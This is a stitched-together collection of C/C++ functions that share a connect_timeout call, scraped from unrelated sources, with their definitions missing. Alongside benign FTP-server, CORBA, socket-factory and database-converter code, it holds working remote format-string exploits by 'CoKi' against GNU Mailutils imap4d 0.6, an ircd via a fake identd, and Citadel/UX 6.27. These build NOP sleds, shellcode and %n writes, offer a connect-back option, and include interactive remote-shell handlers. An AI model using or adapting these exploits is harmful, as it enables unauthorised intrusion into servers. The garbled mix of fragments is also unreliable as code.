int sckClient_connect(void *handle, const char *ip, int port)
{
int ret = 0;
if(handle == NULL || ip == NULL || port <0 || port > 61350){
ret = SCK_ERRPARM;
printf("func sckClien_connect() err\n");
return ret;
}
SckHandle *tmp = handle;
struct sockaddr_in servaddr;
memset(&servaddr, 0, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(port);
servaddr.sin_addr.s_addr = inet_addr(ip);
ret = connect_timeout(tmp->sockfd, (struct sockaddr *)&servaddr, tmp->conntime);
if(ret < 0)
{
if(ret == -1 && errno == ETIMEDOUT) {
ret = SCK_ERRTIMEOUT;
printf("func connect() err: %d\n", ret);
return ret;
}
return ret;
}
return ret;
}
void do_getdatafd(session_t* ssinf)
{
char ip[128] = {0};
int port;
if ( -1 == ftpipc_recv_data(ssinf->nobodyfd,ip,128))
return;
if ( -1 == ftpipc_recv_data(ssinf->nobodyfd,&port,sizeof(int)))
return;
//printf("nobody recv data:oip:%s\t,%u\n",ip,port);
struct sockaddr_in addr;
if ( -1 == ftpipc_recv_data(ssinf->nobodyfd,&addr,sizeof(addr)))
return;
//printf("ip:%s\tport:%d\n",inet_ntoa(addr.sin_addr),ntohs(addr.sin_port));
int fd = tcp_clnt(ip,port);
if ( -1 == connect_timeout(fd,&addr,tunable_connect_timeout))
{
ERR_EXIT("connect_timeout error");
}
//printf("connect success\n");
if ( -1 == fd )
ftpipc_send_ret(ssinf->nobodyfd,FTPIPC_RET_BAD);
ftpipc_send_ret(ssinf->nobodyfd,FTPIPC_RET_OK);
ftpipc_send_fd(ssinf->nobodyfd,fd);
close(fd);
}
int
TAO_OC_Endpoint_Selector_Factory::init (int argc, ACE_TCHAR *argv[])
{
ACE_Time_Value connect_timeout(0,0);
for (int count = 0; count < argc; count++)
{
if ((ACE_OS::strcasecmp (argv[count],
ACE_TEXT ("-connect_timeout")) == 0) &&
count < argc-1)
{
++count;
long const ms = ACE_OS::strtol(argv[count],0,10);
connect_timeout.msec (ms);
}
}
if (this->register_orb_initializer () == -1)
return -1;
ACE_NEW_RETURN (this->oc_endpoint_selector_,
TAO_Optimized_Connection_Endpoint_Selector(connect_timeout),
-1);
return 0;
}
int ConnectToServer()
{
int sockfd = socket( AF_INET, SOCK_STREAM, 0 );
if ( sockfd < 0 )
return -1 ;
struct sockaddr_in serv_addr;
memset( &serv_addr, 0, sizeof(serv_addr) ) ;
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(m_nServerPort);
serv_addr.sin_addr.s_addr = inet_addr(m_szServerIP);
int nRecvBuf = 1024*8;
setsockopt( sockfd, SOL_SOCKET, SO_RCVBUF,(const char*)&nRecvBuf, sizeof(int) );
struct timeval nTimeOut = {6,0};
int ret = setsockopt( sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&nTimeOut, sizeof(nTimeOut) );
if(ret < 0)
return -1;
ret = setsockopt( sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&nTimeOut, sizeof(nTimeOut) );
if(ret < 0)
return -1;
ret = connect_timeout( sockfd, &serv_addr,10) ;
if( ret < 0 )
{
close(sockfd);
return -2 ;
}
return sockfd ;
}
void shell(char *host, int port) {
int sockfd, n;
char buff[BUFFERSIZE];
fd_set readfs;
struct hostent *he;
struct sockaddr_in dest_dir;
printf(" [+] connecting to shell...\t");
fflush(stdout);
if((he=gethostbyname(host)) == NULL) {
herror("Error");
printf("\n");
exit(1);
}
if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
perror("Error");
printf("\n");
exit(1);
}
dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(port);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);
if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT) == ERROR) {
printf("Closed\n\n");
printf(" [-] failed! perhaps the target has down...\n\n");
exit(1);
}
printf("OK\n\n");
printf(" [!] you have a shell :)\n\n");
fflush(stdout);
send(sockfd, "uname -a; id;\n", 14, 0);
while(1) {
FD_ZERO(&readfs);
FD_SET(0, &readfs);
FD_SET(sockfd, &readfs);
if(select(sockfd+1, &readfs, NULL, NULL, NULL) < 1) exit(0);
if(FD_ISSET(0,&readfs)) {
if((n = read(0,buff,sizeof(buff))) < 1)
exit(0);
if(send(sockfd, buff, n, 0) != n) exit(0);
}
if(FD_ISSET(sockfd,&readfs)) {
if((n = recv(sockfd, buff, sizeof(buff), 0)) < 1) exit(0);
write(1, buff, n);
}
}
}
void shell(char *host, int port) {
int sockfd, n;
char buff[BUFFERSIZE], *command = "uname -a; id;\n";
fd_set readfs;
struct hostent *he;
struct sockaddr_in dest_dir;
if((he=gethostbyname(host)) == NULL) {
herror(" gethostbyname()");
printf("\n");
exit(1);
}
if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
perror(" socket()");
printf("\n");
exit(1);
}
dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(port);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);
if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT) == ERROR) {
printf(" failed!\n\n");
exit(1);
}
printf(" done");
fflush(stdout);
/* owned ;) */
printf("\n\n [!] you have a shell :)\n\n");
fflush(stdout);
send(sockfd, command, strlen(command), 0);
while(1) {
FD_ZERO(&readfs);
FD_SET(0, &readfs);
FD_SET(sockfd, &readfs);
if(select(sockfd+1, &readfs, NULL, NULL, NULL) < 1) exit(0);
if(FD_ISSET(0,&readfs)) {
if((n = read(0,buff,sizeof(buff))) < 1)
exit(0);
if(send(sockfd, buff, n, 0) != n) exit(0);
}
if(FD_ISSET(sockfd,&readfs)) {
if((n = recv(sockfd, buff, sizeof(buff), 0)) < 1) exit(0);
write(1, buff, n);
}
}
}
ISmartSocket *CSmartSocketFactory::connectNextAvailableSocket()
{
while(1)
{
try
{
return connect_timeout(1000); // 1 sec
}
catch (ISmartSocketException *e)
{
throw e;
}
catch (IException *e)
{
e->Release(); //keep trying
}
}
return NULL; // should never get here, but make the compiler happy
}
static void privop_pasv_get_data_sock(session_t *sess)
{
/*
socket
bind 20
connect
*/
// tcp_client(20);
/*
*/
char ip[16] = {0};
unsigned short port = (unsigned short)priv_sock_get_int(sess->parent_fd);
priv_sock_recv_buf(sess->parent_fd, ip, sizeof(ip));
struct sockaddr_in addr;
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(ip);
int fd = tcp_client(20);
if (fd == -1)
{
priv_sock_send_result(sess->parent_fd, PRIV_SOCK_RESULT_BAD);
return;
}
if (connect_timeout(fd, &addr, tunable_connect_timeout) < 0)
{
close(fd);
priv_sock_send_result(sess->parent_fd, PRIV_SOCK_RESULT_BAD);
return;
}
priv_sock_send_result(sess->parent_fd, PRIV_SOCK_RESULT_OK);
priv_sock_send_fd(sess->parent_fd, fd);
close(fd);
}
int chkshaddr(char *host, unsigned int imapdport, int i) {
char recvbuf[BUFFERSIZE], evilcmd[BUFFERSIZE], temp[BUFFERSIZE],*addr=NULL;
struct hostent *he;
struct sockaddr_in dest_dir;
int sockfd;
he=gethostbyname(host);
bzero(recvbuf, sizeof(recvbuf));
sockfd=socket(AF_INET, SOCK_STREAM, 0);
dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(imapdport);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);
connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT);
read(sockfd, recvbuf, sizeof(recvbuf));
memset(evilcmd, 0x00, sizeof(evilcmd));
memset(evilcmd, 0x41, 496);
strcat(evilcmd, "BBBBBBBBBBBB");
sprintf(temp, "%%%u$s\n", i);
strcat(evilcmd, temp);
write(sockfd, evilcmd, strlen(evilcmd));
read(sockfd, recvbuf, sizeof(recvbuf));
close(sockfd);
if(strstr(recvbuf, "$s")) return 1;
else return 0;
}
int main(int argc, char* argv[])
{
if (argc < 2) {
printf("usage: %s <host>\n", argv[0]);
return 1;
}
sockaddr_in addr;
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
if (inet_pton(AF_INET, argv[1], &addr.sin_addr) <= 0) {
perror("inet_pton error\n");
return 1;
}
for (int i = 80; i < 100; i++) {
printf("connect port %d ...\n", i);
addr.sin_port = htons(i);
int sfd = socket(AF_INET, SOCK_STREAM, 0);
if (sfd < 0) {
perror("create socket");
return 1;
}
if (connect_timeout(sfd, (struct sockaddr*)&addr, sizeof(addr), 1) < 0) {
perror("connect error");
}
close(sfd);
}
return 0;
}
static void privop_port_get_data_sock(session_t *sess)
{
unsigned short port = (unsigned short)priv_sock_get_int(sess->nobody_fd);
char ip[20] = {0};
priv_sock_recv_buf(sess->nobody_fd, ip, sizeof(ip));
struct sockaddr_in addr;
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(ip);
// 当多个客户端连接服务器时,可以同时有多个nobody进程bind 20端口+ip,因为此时客户端给出的端口是随机的,故
// 四元组还是能识别一个数据连接
// 当客户端位于NAT服务器之后使用PORT模式时,需要在NAT服务器上配置映射才能让服务器主动连接到客户端
// 所以采用的是标准固定的20端口,这样NAT服务器就不用维护很多的表目
int fd = tcp_client(20);
if (fd == -1)
{
priv_sock_send_result(sess->nobody_fd, PRIV_SOCK_RESULT_BAD);
return;
}
if (connect_timeout(fd, &addr, tunable_connect_timeout) < 0)
{
close(fd);
priv_sock_send_result(sess->nobody_fd, PRIV_SOCK_RESULT_BAD);
return;
}
priv_sock_send_result(sess->nobody_fd, PRIV_SOCK_RESULT_OK);
priv_sock_send_fd(sess->nobody_fd, fd);
close(fd); //父进程必须close(fd),否则子进程关闭close(data_fd)的时候也不会发送FIN段。
//因为通过unix域协议传递套接字等于是对方也打开套接字,而直接简单的赋值是没有这样的效果的。
}
void exploit(char *host, int gotaddr, int retaddr, int ircdport) {
char ident[BUFFERSIZE], temp[BUFFERSIZE], recvbuf[BUFFERSIZE];
int sock, newsock, sockfd, i, reuseaddr=1;
unsigned int bal1, bal2, bal3, bal4;
int cn1, cn2, cn3, cn4;
struct sockaddr_in dest_dir;
struct sockaddr_in remoteaddr;
struct sockaddr_in localaddr;
int addrlen = sizeof(struct sockaddr_in);
struct hostent *he;
if((he=gethostbyname(host)) == NULL) {
herror(" gethostbyname()");
printf("\n");
exit(1);
}
/* building evil buffer */
if(!b) {
printf(" [*] building evil buffer\t:");
fflush(stdout);
}
sprintf(ident, "0 , 0 : USERID : OTHER :");
/* adding GOT address */
for(i = 0; i < 4; i++) {
bzero(temp, sizeof(temp));
sprintf(temp, "%s", &gotaddr);
strncat(ident, temp, 4);
gotaddr++;
}
bal1 = (retaddr & 0xff000000) >> 24;
bal2 = (retaddr & 0x00ff0000) >> 16;
bal3 = (retaddr & 0x0000ff00) >> 8;
bal4 = (retaddr & 0x000000ff);
cn1 = bal4 - 16 - 36 - 70 - 92;
cn1 = check(cn1);
cn2 = bal3 - bal4;
cn2 = check(cn2);
cn3 = bal2 - bal3;
cn3 = check(cn3);
cn4 = bal1 - bal2;
cn4 = check(cn4);
/* adding NOP's */
memset(temp, '\x90', 70);
strcat(ident, temp);
bzero(temp, sizeof(temp));
/* adding shellcode */
strcat(ident, shellcode);
/* adding format string */
sprintf(temp, "%%%du%%12$n%%%du%%13$n%%%du%%14$n%%%du%%15$n", cn1,
cn2, cn3, cn4);
strcat(ident, temp);
strcat(ident, "\n");
/* running fake identd */
if(!b) {
printf(" done!\n");
printf(" [*] running fake ident server\t:");
fflush(stdout);
}
localaddr.sin_family = AF_INET;
localaddr.sin_port = htons(IDENTD);
localaddr.sin_addr.s_addr = INADDR_ANY;
bzero(&(localaddr.sin_zero), 8);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror(" socket()");
printf("\n");
exit(1);
}
if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &reuseaddr,
(socklen_t)sizeof(reuseaddr)) < 0) {
perror(" setsockopt()");
printf("\n");
exit(1);
}
if (bind(sock, (struct sockaddr *)&localaddr, sizeof(localaddr)) < 0)
{
perror(" bind()");
printf("\n");
exit(1);
}
if (listen(sock, 1) < 0) {
perror(" listen()");
printf("\n");
exit(1);
}
/* connecting to ircd */
if(!b) {
printf(" %s:%u\n\n", inet_ntoa(localaddr.sin_addr),
ntohs(localaddr.sin_port));
printf(" [*] connecting to ircd...\t:");
fflush(stdout);
}
if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
perror(" socket");
printf("\n");
exit(1);
}
dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(ircdport);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);
if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT) == ERROR) {
printf(" closed\n\n");
exit(1);
}
/* waiting for answer */
if(!b) {
printf(" %s:%u connected\n", inet_ntoa(dest_dir.sin_addr),
ntohs(dest_dir.sin_port));
printf(" [*] waiting for answer...\t:");
fflush(stdout);
}
if ((newsock = accept(sock, (struct sockaddr *)&remoteaddr, &addrlen))
< 0) {
perror(" accept()");
printf("\n");
exit(1);
}
if (getpeername(newsock, (struct sockaddr *)&remoteaddr, &addrlen) <
0) {
perror(" getpeername()");
printf("\n");
exit(1);
}
if (read(newsock, recvbuf, sizeof(recvbuf)) <= 0) {
perror(" read()");
printf("\n");
exit(1);
}
if(!b) {
printf(" %s:%u connected\n", inet_ntoa(remoteaddr.sin_addr),
ntohs(remoteaddr.sin_port));
fflush(stdout);
/* sending evil ident */
printf(" [*] sending evil ident...\t:");
fflush(stdout);
}
if (write(newsock, ident, strlen(ident)) <= 0) {
perror(" write()");
printf("\n");
exit(1);
}
close(sock);
close(newsock);
close(sockfd);
if(!b) {
printf(" done!\n");
fflush(stdout);
/* checking for shell */
printf(" [*] checking for shell...\t:");
fflush(stdout);
}
shell(host, SHELL);
}
int main ( int argc, char** argv)
{
namespace po = boost::program_options;
po::options_description desc("Postgresql/PostGIS to SQLite3 converter\n Options");
std::string usage = "usage: pgsql2sqlite --dbname db --table planet_osm_line --file osm.sqlite --query \"select * from planet_osm_line\"";
try
{
desc.add_options()
("help,?","Display this help screen.")
("host,h",po::value<std::string>(),"Allows you to specify connection to a database on a machine other than the default.")
("port,p",po::value<std::string>(),"Allows you to specify a database port other than the default.")
("user,u",po::value<std::string>(),"Connect to the database as the specified user.")
("dbname,d",po::value<std::string>(),"postgresql database name")
("password,P",po::value<std::string>(),"Connect to the database with the specified password.")
("query,q",po::value<std::string>(),"Name of the table/or query to pass to postmaster")
("table,t",po::value<std::string>(),"Name of the output table to create (default: table in query)")
("file,f",po::value<std::string>(),"Use this option to specify the name of the file to create.")
;
//po::positional_options_description p;
//p.add("table",1);
po::variables_map vm;
//positional(p)
po::store(po::command_line_parser(argc,argv).options(desc).run(),vm);
po::notify(vm);
if (vm.count("help"))
{
std::cout << desc << "\n";
std::cout << usage << "\n";
return EXIT_SUCCESS;
}
else if ( !vm.count("dbname") || !vm.count("file") || !vm.count("query") )
{
std::cout << desc << "\n";
std::cout << usage << "\n";
std::cout << "Both --dbname, --file and, --query are required\n";
return EXIT_FAILURE;
}
boost::optional<std::string> host;
boost::optional<std::string> port ;
boost::optional<std::string> dbname;
boost::optional<std::string> user;
boost::optional<std::string> password;
boost::optional<std::string> connect_timeout("4");
if (vm.count("host")) host = vm["host"].as<std::string>();
if (vm.count("port")) port = vm["port"].as<std::string>();
if (vm.count("dbname")) dbname = vm["dbname"].as<std::string>();
if (vm.count("user")) user = vm["user"].as<std::string>();
if (vm.count("password")) password = vm["password"].as<std::string>();
ConnectionCreator<Connection> creator(host,port,dbname,user,password,connect_timeout);
try
{
std::shared_ptr<Connection> conn(creator());
std::string query = vm["query"].as<std::string>();
std::string output_table_name = vm.count("table") ? vm["table"].as<std::string>() : mapnik::sql_utils::table_from_sql(query);
std::string output_file = vm["file"].as<std::string>();
std::cout << "output_table : " << output_table_name << "\n";
mapnik::pgsql2sqlite(conn,query,output_table_name,output_file);
}
catch (mapnik::datasource_exception & ex)
{
std::cerr << ex.what() << "\n";
}
}
catch(std::exception& e) {
std::cerr << desc << "\n";
std::cout << usage << "\n";
std::cerr << e.what() << "\n";
return EXIT_FAILURE;
}
return EXIT_SUCCESS;
}
void exploit(char *host, unsigned int imapdport) {
char evilcmd[BUFFERSIZE], temp[BUFFERSIZE], recvbuf[BUFFERSIZE];
int cn1, cn2, cn3, cn4, sockfd, retaddr;
unsigned int bal1, bal2, bal3, bal4;
struct hostent *he;
struct sockaddr_in dest_dir;
if((he=gethostbyname(host)) == NULL) {
herror(" gethostbyname()");
printf("\n");
exit(1);
}
for(retaddr=bretaddr; retaddr>=(bretaddr-500); retaddr -= 4) {
printf(" [*] searching ret address...\t: %010p", retaddr);
fflush(stdout);
bzero(evilcmd, sizeof(evilcmd));
memset(evilcmd, 0x90, 496);
if(cback) memcpy(evilcmd + 350, conn_back, strlen(conn_back));
else memcpy(evilcmd + 350, port_bind, strlen(port_bind));
bzero(temp, sizeof(temp));
sprintf(temp, "%s", &retaddr);
strncat(evilcmd, temp, 4);
retaddr++;
sprintf(temp, "%s", &retaddr);
strncat(evilcmd, temp, 4);
retaddr++;
sprintf(temp, "%s", &retaddr);
strncat(evilcmd, temp, 4);
bal1 = (shaddr & 0xffff0000) >> 16;
bal2 = (shaddr & 0x0000ffff);
cn1 = bal2 - 496 - 12;
cn1 = check(cn1);
cn2 = bal1 - bal2;
cn2 = check(cn2);
sprintf(temp, "%%%du%%%u$n%%%du%%%u$n", cn1, pos, cn2, pos+2);
strcat(evilcmd, temp);
strcat(evilcmd, "\n");
if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
perror(" socket");
printf("\n");
exit(1);
}
dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(imapdport);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);
if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT) == ERROR) {
printf(" closed\n\n");
exit(1);
}
if (read(sockfd, recvbuf, sizeof(recvbuf)) <= 0) {
perror(" read()");
printf("\n");
exit(1);
}
if (write(sockfd, evilcmd, strlen(evilcmd)) <= 0) {
perror(" write()");
printf("\n");
exit(1);
}
close(sockfd);
if(cback) {
printf("\r\r");
continue;
}
else shell(host, PORTBIND);
retaddr -= 2;
}
if(cback) printf("\n\n [!] finished!\n\n");
else printf("\n\n [!] failed!\n\n");
}
void getinfo(char *host, unsigned int imapdport) {
char recvbuf[BUFFERSIZE], evilcmd[BUFFERSIZE], temp[BUFFERSIZE],*addr=NULL;
struct hostent *he;
struct sockaddr_in dest_dir;
int sockfd, i;
if((he=gethostbyname(host)) == NULL) {
herror(" gethostbyname()");
printf("\n");
exit(1);
}
printf(" [*] getting target info...\n");
fflush(stdout);
for(i=1; i<50; i++) {
bzero(recvbuf, sizeof(recvbuf));
sockfd=socket(AF_INET, SOCK_STREAM, 0);
dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(imapdport);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);
connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT);
read(sockfd, recvbuf, sizeof(recvbuf));
memset(evilcmd, 0x00, sizeof(evilcmd));
memset(evilcmd, 0x41, 496);
strcat(evilcmd, "BBBBBBBBBBBB");
sprintf(temp, ".%%%u$.8p\n", i);
strcat(evilcmd, temp);
write(sockfd, evilcmd, strlen(evilcmd));
read(sockfd, recvbuf, sizeof(recvbuf));
close(sockfd);
addr = strstr(recvbuf, ".");
if(pos == 0) if(strstr(addr, "42424242")) pos = i;
if(shaddr == 0) {
if(strstr(addr, "0x08")) {
if(chkshaddr(host, imapdport, i)) {
shaddr = strtoul(++addr, 0, 0);
printf(" [*] buffer address\t\t: %.8p\n", shaddr);
shaddr += 350;
printf(" [*] shellcode address\t\t: %.8p\n", shaddr);
}
}
}
if(bretaddr == 0) {
if(strstr(addr, "0xbf")) {
bretaddr = strtoul(++addr, 0, 0);
printf(" [*] basic return address\t: %.8p\n", bretaddr);
}
}
if(pos != 0 && shaddr != 0 && bretaddr != 0) break;
}
if(shaddr == 0) {
printf(" [*] shellcode address\t\t: not found!\n\n");
exit(1);
}
if(bretaddr == 0) {
printf(" [*] basic return address\t: not found!\n\n");
exit(1);
}
printf("\n");
}
int main(int argc, char *argv[]) {
char opt, *host=NULL, *rh=NULL;
int sockfd;
unsigned int imapdport=IMAPD;
struct hostent *he;
struct sockaddr_in dest_dir;
printf("\n GNU Mailutils imap4d v0.6 remote format string exploit\n");
printf(" by CoKi <*****@*****.**>\n\n");
while((opt = getopt(argc,argv,"h:p:c:b:")) != EOF) {
switch (opt) {
case 'h':
host = optarg;
break;
case 'p':
imapdport = atoi(optarg);
break;
case 'c':
rhost = inet_addr(optarg);
rh = optarg;
cback++;
break;
case 'b':
rport = atoi(optarg);
break;
default:
use(argv[0]);
break;
}
}
if(host == NULL) use(argv[0]);
if(cback) {
printf(" [*] verifying your host\t:");
fflush(stdout);
if((he=gethostbyname(rh)) == NULL) {
herror(" gethostbyname()");
printf("\n");
exit(1);
}
shsize = strlen(conn_back);
conn_back[33]=(rhost & 0x000000ff);
conn_back[34]=(rhost & 0x0000ff00) >> 8;
conn_back[35]=(rhost & 0x00ff0000) >> 16;
conn_back[36]=(rhost & 0xff000000) >> 24;
conn_back[39]=(rport & 0xff00) >> 8;
conn_back[40]=(rport & 0x00ff);
printf(" %s\n", inet_ntoa(*((struct in_addr *)he->h_addr)));
printf(" [*] connect back port\t\t: %u\n", rport);
}
if(strlen(conn_back) < shsize) {
printf("\n [!] failed! your host or port contain null-bytes\n\n");
exit(1);
}
printf(" [*] verifying target host\t:");
if((he=gethostbyname(host)) == NULL) {
herror(" gethostbyname()");
printf("\n");
exit(1);
}
printf(" %s\n", inet_ntoa(*((struct in_addr *)he->h_addr)));
printf(" [*] target imapd port\t\t: %u\n\n", imapdport);
printf(" [*] connecting...\t\t:");
fflush(stdout);
if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
perror(" socket()");
printf("\n");
exit(1);
}
dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(imapdport);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);
if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT) == ERROR) {
printf(" closed\n\n");
exit(1);
}
printf(" done!\n\n");
getinfo(host, imapdport);
exploit(host, imapdport);
}
ISmartSocket *CSmartSocketFactory::connect()
{
return connect_timeout(0);
}
int main(int argc, char *argv[]) {
char buffer[BUFFERSIZE], temp[BUFFERSIZE];
char opt, *host=NULL, *system=NULL, *p;
int sockfd, i, retaddr=0, gotaddr=0, targetnum=0;
unsigned int bal1, bal2, bal3, bal4;
int cn1, cn2, cn3, cn4;
struct hostent *he;
struct sockaddr_in dest_dir;
printf("\n Citadel/UX v6.27 remote format string exploit\n");
printf(" by CoKi <*****@*****.**>\n\n");
while ((opt = getopt(argc,argv,"h:g:r:t:l")) != EOF) {
switch (opt) {
case 'h':
host = optarg;
break;
case 'g':
gotaddr = strtoul(optarg,NULL,0);
break;
case 'r':
retaddr = strtoul(optarg,NULL,0);
break;
case 't':
targetnum = atoi(optarg);
if(targetnum != 0) {
printf(" invalid target number!\n\n");
exit(0);
}
system = targets[targetnum].os;
gotaddr = targets[targetnum].got;
retaddr = targets[targetnum].ret;
break;
case 'l':
printlist();
break;
default:
use(argv[0]);
break;
}
}
if(host == NULL) use(argv[0]);
if(gotaddr == 0 || retaddr == 0) use(argv[0]);
if(system == NULL) system = "unknown";
printf(" [*] host\t\t\t: %s\n", host);
printf(" [*] system\t\t\t: %s\n", system);
printf(" [*] syslog GOT address\t\t: %010p\n", gotaddr);
printf(" [*] RET address\t\t: %010p\n\n", retaddr);
printf(" [+] verifying host...\t\t");
fflush(stdout);
if((he=gethostbyname(host)) == NULL) {
herror("Error");
printf("\n");
exit(1);
}
printf("OK\n");
if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
perror("Error");
printf("\n");
exit(1);
}
dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(PORT);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);
printf(" [+] conecting...\t\t");
fflush(stdout);
if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT) == ERROR) {
printf("Closed\n\n");
exit(1);
}
printf("OK\n");
printf(" [+] building evil buffer...\t");
fflush(stdout);
bzero(buffer, sizeof(buffer));
strcat(buffer, "x");
for(i = 0; i < 4; i++) {
bzero(temp, sizeof(temp));
sprintf(temp, "%s", &gotaddr);
strncat(buffer, temp, 4);
gotaddr++;
}
bal1 = (retaddr & 0xff000000) >> 24;
bal2 = (retaddr & 0x00ff0000) >> 16;
bal3 = (retaddr & 0x0000ff00) >> 8;
bal4 = (retaddr & 0x000000ff);
cn1 = bal4 - 16 - 1 - 15 - 50 - 92;
cn1 = check(cn1);
cn2 = bal3 - bal4;
cn2 = check(cn2);
cn3 = bal2 - bal3;
cn3 = check(cn3);
cn4 = bal1 - bal2;
cn4 = check(cn4);
p = buffer;
p += 17;
memset(p, '\x90', 50);
strcat(buffer, shellcode);
sprintf(temp, "%%%du%%27$n%%%du%%28$n%%%du%%29$n%%%du%%30$n",
cn1, cn2, cn3, cn4);
strcat(buffer, temp);
bzero(temp, sizeof(temp));
printf("OK\n");
printf(" [+] sending evil buffer...\t");
fflush(stdout);
recv(sockfd, temp, sizeof(temp), 0);
send(sockfd, buffer, strlen(buffer), 0);
send(sockfd, "\n", 1, 0);
close(sockfd);
printf("OK\n\n");
printf(" [+] waiting for shell...\n");
fflush(stdout);
sleep(2);
shell(host, SHELL);
}
